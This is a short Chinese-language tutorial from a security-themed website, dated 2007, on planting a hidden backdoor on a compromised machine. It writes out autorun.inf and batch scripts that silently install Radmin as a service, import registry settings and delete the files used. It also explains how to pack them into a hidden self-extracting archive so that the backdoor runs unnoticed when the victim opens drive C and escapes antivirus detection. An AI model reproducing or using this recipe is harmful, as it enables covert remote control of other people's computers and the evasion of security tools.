入侵网站后全自动安装后门

作者：荣森网安网站维护基地 来源：荣森网安服务器维护基地 浏览次数：0

本篇关键词：网站后门

荣森网安网讯：只要你有上传的权限。 一共三个文件 1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件） 思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。 第一文件带动运行第二文件。同时第二运行第三 运行完可正 ...

只要你有上传的权限。 
一共三个文件 
1.autorun.inf 2.shell.bat 3.hao.exe(自解压文件） 
思路：全部放在C盘下。当肉鸡主人双击C盘时自动运行第一文件。 
第一文件带动运行第二文件。同时第二运行第三 
运行完可正常进入C盘。不会让人发觉。并且里面所带的批处理，会在最后把所有文件删除。此时，后门却已经装上去了 
《此法针对没有权限运行木马的入侵活动》 

制作： 
[autorun] 
open=shell.bat 
这个是autorun.inf 
@echo off 
hao.exe 
c:\windows\explorer c:\ 
del autorun.inf 
del rad.exe 
del shell.bat 
这个是shell.bat 
hao.exe 里面包含admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件《关键所在》 
r.bat－－》批处理做法 
@echo off 
@pchealthy.exe /install /silence 
@regedit /s admin.reg 
@net start r_server 
@del admin.reg 
@del r.bat 
其他四个就是Radmin的文件。这个大家都会，复制过来就行 
OK，我们再来看自解压的处理，在解压路径里我们用 
%systemroot%\system32，就是解压到系统目录里 
并且 “解压后运行”填上我们的r.bat文件！！！！！！ 
因为这里的文件比较多，比较隐蔽 
解压模式我们选 “全部隐藏”，和 “覆盖所有文件”！ 
好了，一个不被杀毒软件所能查杀的好后门程序就成功制作出来了！ 
大家不要放在文件夹里压缩哦，要直接选上admdll.dll raddrv.dll admin.reg pchealthy.exe r.bat五个文件压缩 
哈哈。。这样就行啦。

    荣森网安本篇连接：

更新时间:2007-10-05 15:46:25  【】  【】

上一篇：如何查杀和防范网站程序中的木马存在
下一篇：win服务器访问局域网时保留的缓存用户名和密码清除方案